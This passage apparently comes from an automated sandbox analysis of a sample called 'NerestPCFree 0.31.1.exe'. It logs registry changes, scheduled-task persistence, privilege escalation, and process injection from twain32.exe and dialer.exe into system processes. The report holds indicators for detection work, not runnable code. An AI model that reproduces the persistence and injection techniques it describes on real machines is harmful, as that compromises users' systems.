\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02nuskzkuabdezag\DeviceId = "<Data LastUpdatedTime=\"1734195541\"><User username=\"02NUSKZKUABDEZAG\"/></Data>\r\n" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs dialer.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-3350944739-639801879-157714471-1000\02jjupzaogyqpeni\DeviceId = "<Data><User username=\"02JJUPZAOGYQPENI\"><HardwareInfo BoundTime=\"1734195572\" TpmKeyStateClient=\"0\" TpmKeyStateServer=\"0\" LicenseInstallError=\"0\"/></User></Data>\r\n" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02nuskzkuabdezag svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-3350944739-639801879-157714471-1000\02hffkmccggumxty\AppIdList svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02hffkmccggumxty\Response Saturday, December 14, 2024 16:59:30 = "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" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-3350944739-639801879-157714471-1000\02jjupzaogyqpeni\DeviceId = "<Data><User username=\"02JJUPZAOGYQPENI\"/></Data>\r\n" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-3350944739-639801879-157714471-1000\ValidDeviceId svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02nuskzkuabdezag\DeviceId = "<Data LastUpdatedTime=\"1734195541\"><User username=\"02NUSKZKUABDEZAG\"><HardwareInfo BoundTime=\"1734195541\" TpmKeyStateClient=\"1\" TpmKeyStateServer=\"3\" LicenseKeySequence=\"1\" LicenseInstallError=\"0\" LicenseKeyVersion=\"2\"/></User></Data>\r\n" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-3350944739-639801879-157714471-1000\02jjupzaogyqpeni\AppIdList = "{AFDA72BF-3409-413A-B54E-2AB8D66A7826};" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\ValidDeviceId = "02nuskzkuabdezag" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02nuskzkuabdezag\AppIdList = "{AFDA72BF-3409-413A-B54E-2AB8D66A7826};" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02nuskzkuabdezag\Provision Saturday, December 14, 2024 16:58:59 = "AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAATEsmPOMyVkOonVeptikfaAAAAAACAAAAAAAQZgAAAAEAACAAAACNJ5vY9yKSIoitCTTo5nnyPGcqa4v3PDV9uU7aWvWutwAAAAAOgAAAAAIAACAAAAB5bqTDDqziKJkym/Sf73kUjDJqBgT2lFIx3vrYeJdeOSAAAABvp7qLbgHAYJ/QoHcxHiX084AkUVjQ6PkUfjDwdetvcEAAAABLTBlhYXn/KypSBSGWhXtd2bCVZRrW/cqt/jR/JQ8xUY7c7IiyF5BCfrzroWkVFgcHp7pJRX5UEQRL8qqlgr4o" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "00180012BAD7E2EA" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02hffkmccggumxty svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\DeviceLicenseUpdateFailureCount = "0" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe -
Modifies registry class 3 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings MpDefenderCoreService.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings MsServerHost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Explorer.EXE -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 624 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 18 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4876 schtasks.exe 1700 schtasks.exe 940 schtasks.exe 3732 schtasks.exe 4852 schtasks.exe 3404 schtasks.exe 2864 schtasks.exe 4856 schtasks.exe 1164 schtasks.exe 2856 schtasks.exe 3660 schtasks.exe 1340 schtasks.exe 740 schtasks.exe 1452 schtasks.exe 1996 schtasks.exe 3380 schtasks.exe 4052 schtasks.exe 2884 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4052 twain32.exe 4052 twain32.exe 4036 powershell.exe 4036 powershell.exe 4052 twain32.exe 4052 twain32.exe 4052 twain32.exe 4052 twain32.exe 4052 twain32.exe 4052 twain32.exe 4052 twain32.exe 4052 twain32.exe 1228 dialer.exe 1228 dialer.exe 4284 powershell.exe 4284 powershell.exe 1228 dialer.exe 1228 dialer.exe 1228 dialer.exe 1228 dialer.exe 1228 dialer.exe 1228 dialer.exe 1228 dialer.exe 1228 dialer.exe 4052 twain32.exe 4052 twain32.exe 1228 dialer.exe 1228 dialer.exe 1228 dialer.exe 1228 dialer.exe 1228 dialer.exe 1228 dialer.exe 1228 dialer.exe 1228 dialer.exe 1228 dialer.exe 1228 dialer.exe 1228 dialer.exe 1228 dialer.exe 1228 dialer.exe 1228 dialer.exe 1228 dialer.exe 1228 dialer.exe 1228 dialer.exe 1228 dialer.exe 1228 dialer.exe 1228 dialer.exe 1228 dialer.exe 1228 dialer.exe 1228 dialer.exe 1228 dialer.exe 1228 dialer.exe 1228 dialer.exe 1228 dialer.exe 1228 dialer.exe 1228 dialer.exe 1228 dialer.exe 1228 dialer.exe 1228 dialer.exe 1228 dialer.exe 1228 dialer.exe 1228 dialer.exe 1228 dialer.exe 1228 dialer.exe 1228 dialer.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3364 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4036 powershell.exe Token: SeDebugPrivilege 1228 dialer.exe Token: SeShutdownPrivilege 1704 powercfg.exe Token: SeCreatePagefilePrivilege 1704 powercfg.exe Token: SeShutdownPrivilege 816 powercfg.exe Token: SeCreatePagefilePrivilege 816 powercfg.exe Token: SeDebugPrivilege 4284 powershell.exe Token: SeShutdownPrivilege 2264 powercfg.exe Token: SeCreatePagefilePrivilege 2264 powercfg.exe Token: SeShutdownPrivilege 1532 powercfg.exe Token: SeCreatePagefilePrivilege 1532 powercfg.exe Token: SeIncreaseQuotaPrivilege 4284 powershell.exe Token: SeSecurityPrivilege 4284 powershell.exe Token: SeTakeOwnershipPrivilege 4284 powershell.exe Token: SeLoadDriverPrivilege 4284 powershell.exe Token: SeSystemProfilePrivilege 4284 powershell.exe Token: SeSystemtimePrivilege 4284 powershell.exe Token: SeProfSingleProcessPrivilege 4284 powershell.exe Token: SeIncBasePriorityPrivilege 4284 powershell.exe Token: SeCreatePagefilePrivilege 4284 powershell.exe Token: SeBackupPrivilege 4284 powershell.exe Token: SeRestorePrivilege 4284 powershell.exe Token: SeShutdownPrivilege 4284 powershell.exe Token: SeDebugPrivilege 4284 powershell.exe Token: SeSystemEnvironmentPrivilege 4284 powershell.exe Token: SeRemoteShutdownPrivilege 4284 powershell.exe Token: SeUndockPrivilege 4284 powershell.exe Token: SeManageVolumePrivilege 4284 powershell.exe Token: 33 4284 powershell.exe Token: 34 4284 powershell.exe Token: 35 4284 powershell.exe Token: 36 4284 powershell.exe Token: SeAssignPrimaryTokenPrivilege 2540 svchost.exe Token: SeIncreaseQuotaPrivilege 2540 svchost.exe Token: SeSecurityPrivilege 2540 svchost.exe Token: SeTakeOwnershipPrivilege 2540 svchost.exe Token: SeLoadDriverPrivilege 2540 svchost.exe Token: SeSystemtimePrivilege 2540 svchost.exe Token: SeBackupPrivilege 2540 svchost.exe Token: SeRestorePrivilege 2540 svchost.exe Token: SeShutdownPrivilege 2540 svchost.exe Token: SeSystemEnvironmentPrivilege 2540 svchost.exe Token: SeUndockPrivilege 2540 svchost.exe Token: SeManageVolumePrivilege 2540 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2540 svchost.exe Token: SeIncreaseQuotaPrivilege 2540 svchost.exe Token: SeSecurityPrivilege 2540 svchost.exe Token: SeTakeOwnershipPrivilege 2540 svchost.exe Token: SeLoadDriverPrivilege 2540 svchost.exe Token: SeSystemtimePrivilege 2540 svchost.exe Token: SeBackupPrivilege 2540 svchost.exe Token: SeRestorePrivilege 2540 svchost.exe Token: SeShutdownPrivilege 2540 svchost.exe Token: SeSystemEnvironmentPrivilege 2540 svchost.exe Token: SeUndockPrivilege 2540 svchost.exe Token: SeManageVolumePrivilege 2540 svchost.exe Token: SeIncreaseQuotaPrivilege 4284 powershell.exe Token: SeSecurityPrivilege 4284 powershell.exe Token: SeTakeOwnershipPrivilege 4284 powershell.exe Token: SeLoadDriverPrivilege 4284 powershell.exe Token: SeSystemProfilePrivilege 4284 powershell.exe Token: SeSystemtimePrivilege 4284 powershell.exe Token: SeProfSingleProcessPrivilege 4284 powershell.exe Token: SeIncBasePriorityPrivilege 4284 powershell.exe -
Suspicious use of FindShellTrayWindow 20 IoCs
pid Process 2068 taskmgr.exe 2068 taskmgr.exe 2068 taskmgr.exe 2068 taskmgr.exe 2068 taskmgr.exe 2068 taskmgr.exe 2068 taskmgr.exe 2068 taskmgr.exe 2068 taskmgr.exe 2068 taskmgr.exe 2068 taskmgr.exe 2068 taskmgr.exe 2068 taskmgr.exe 3364 Explorer.EXE 3364 Explorer.EXE 2068 taskmgr.exe 2068 taskmgr.exe 2068 taskmgr.exe 2068 taskmgr.exe 2068 taskmgr.exe -
Suspicious use of SendNotifyMessage 40 IoCs
pid Process 2068 taskmgr.exe 2068 taskmgr.exe 2068 taskmgr.exe 2068 taskmgr.exe 2068 taskmgr.exe 2068 taskmgr.exe 2068 taskmgr.exe 2068 taskmgr.exe 2068 taskmgr.exe 2068 taskmgr.exe 2068 taskmgr.exe 2068 taskmgr.exe 2068 taskmgr.exe 2068 taskmgr.exe 2068 taskmgr.exe 2068 taskmgr.exe 3364 Explorer.EXE 3364 Explorer.EXE 3364 Explorer.EXE 3364 Explorer.EXE 3364 Explorer.EXE 3364 Explorer.EXE 3364 Explorer.EXE 3364 Explorer.EXE 3364 Explorer.EXE 3364 Explorer.EXE 3364 Explorer.EXE 3364 Explorer.EXE 3364 Explorer.EXE 3364 Explorer.EXE 3364 Explorer.EXE 3364 Explorer.EXE 3364 Explorer.EXE 3364 Explorer.EXE 3364 Explorer.EXE 3364 Explorer.EXE 3364 Explorer.EXE 3364 Explorer.EXE 2068 taskmgr.exe 2068 taskmgr.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 1984 Conhost.exe 4788 Conhost.exe 1132 Conhost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4764 wrote to memory of 2660 4764 NerestPCFree 0.31.1.exe 83 PID 4764 wrote to memory of 2660 4764 NerestPCFree 0.31.1.exe 83 PID 4764 wrote to memory of 2660 4764 NerestPCFree 0.31.1.exe 83 PID 4764 wrote to memory of 4052 4764 NerestPCFree 0.31.1.exe 84 PID 4764 wrote to memory of 4052 4764 NerestPCFree 0.31.1.exe 84 PID 2660 wrote to memory of 992 2660 MpDefenderCoreService.exe 85 PID 2660 wrote to memory of 992 2660 MpDefenderCoreService.exe 85 PID 2660 wrote to memory of 992 2660 MpDefenderCoreService.exe 85 PID 1036 wrote to memory of 3452 1036 cmd.exe 91 PID 1036 wrote to memory of 3452 1036 cmd.exe 91 PID 1036 wrote to memory of 3408 1036 cmd.exe 92 PID 1036 wrote to memory of 3408 1036 cmd.exe 92 PID 1036 wrote to memory of 4388 1036 cmd.exe 93 PID 1036 wrote to memory of 4388 1036 cmd.exe 93 PID 1036 wrote to memory of 212 1036 cmd.exe 94 PID 1036 wrote to memory of 212 1036 cmd.exe 94 PID 1036 wrote to memory of 4760 1036 cmd.exe 95 PID 1036 wrote to memory of 4760 1036 cmd.exe 95 PID 4052 wrote to memory of 1228 4052 twain32.exe 98 PID 2756 wrote to memory of 1704 2756 cmd.exe 101 PID 2756 wrote to memory of 1704 2756 cmd.exe 101 PID 2756 wrote to memory of 816 2756 cmd.exe 102 PID 2756 wrote to memory of 816 2756 cmd.exe 102 PID 2756 wrote to memory of 2264 2756 cmd.exe 103 PID 2756 wrote to memory of 2264 2756 cmd.exe 103 PID 2756 wrote to memory of 1532 2756 cmd.exe 104 PID 2756 wrote to memory of 1532 2756 cmd.exe 104 PID 1228 wrote to memory of 596 1228 dialer.exe 5 PID 1228 wrote to memory of 672 1228 dialer.exe 7 PID 1228 wrote to memory of 952 1228 dialer.exe 12 PID 1228 wrote to memory of 64 1228 dialer.exe 13 PID 1228 wrote to memory of 448 1228 dialer.exe 14 PID 1228 wrote to memory of 1028 1228 dialer.exe 15 PID 1228 wrote to memory of 1044 1228 dialer.exe 16 PID 672 wrote to memory of 2484 672 lsass.exe 44 PID 1228 wrote to memory of 1052 1228 dialer.exe 17 PID 1228 wrote to memory of 1184 1228 dialer.exe 19 PID 1228 wrote to memory of 1196 1228 dialer.exe 20 PID 1228 wrote to memory of 1320 1228 dialer.exe 21 PID 1228 wrote to memory of 1328 1228 dialer.exe 22 PID 1228 wrote to memory of 1396 1228 dialer.exe 23 PID 672 wrote to memory of 2484 672 lsass.exe 44 PID 1228 wrote to memory of 1404 1228 dialer.exe 24 PID 1228 wrote to memory of 1412 1228 dialer.exe 25 PID 1228 wrote to memory of 1504 1228 dialer.exe 26 PID 1228 wrote to memory of 1544 1228 dialer.exe 27 PID 1228 wrote to memory of 1596 1228 dialer.exe 28 PID 1228 wrote to memory of 1672 1228 dialer.exe 29 PID 1228 wrote to memory of 1720 1228 dialer.exe 30 PID 1228 wrote to memory of 1780 1228 dialer.exe 31 PID 1228 wrote to memory of 1832 1228 dialer.exe 32 PID 1228 wrote to memory of 1896 1228 dialer.exe 33 PID 1228 wrote to memory of 1904 1228 dialer.exe 34 PID 1228 wrote to memory of 1924 1228 dialer.exe 35 PID 1228 wrote to memory of 1976 1228 dialer.exe 36 PID 1228 wrote to memory of 1004 1228 dialer.exe 37 PID 1228 wrote to memory of 1804 1228 dialer.exe 39 PID 1228 wrote to memory of 2184 1228 dialer.exe 40 PID 1228 wrote to memory of 2364 1228 dialer.exe 41 PID 1228 wrote to memory of 2372 1228 dialer.exe 42 PID 1228 wrote to memory of 2424 1228 dialer.exe 43 PID 1228 wrote to memory of 2484 1228 dialer.exe 44 PID 1228 wrote to memory of 2508 1228 dialer.exe 45 PID 1228 wrote to memory of 2532 1228 dialer.exe 46 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:596
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:64
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:672
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:952
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:448
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1028
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:1044
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1052
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1184 -
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:3008
-
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
PID:3552
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:1196
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1320
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1328
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1396
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1404
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1412
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1504
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1544
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2892
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1596
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1672
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1720
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1780
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1832
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1896
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1904
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1924
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1976
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1004
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:1804
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2184
-
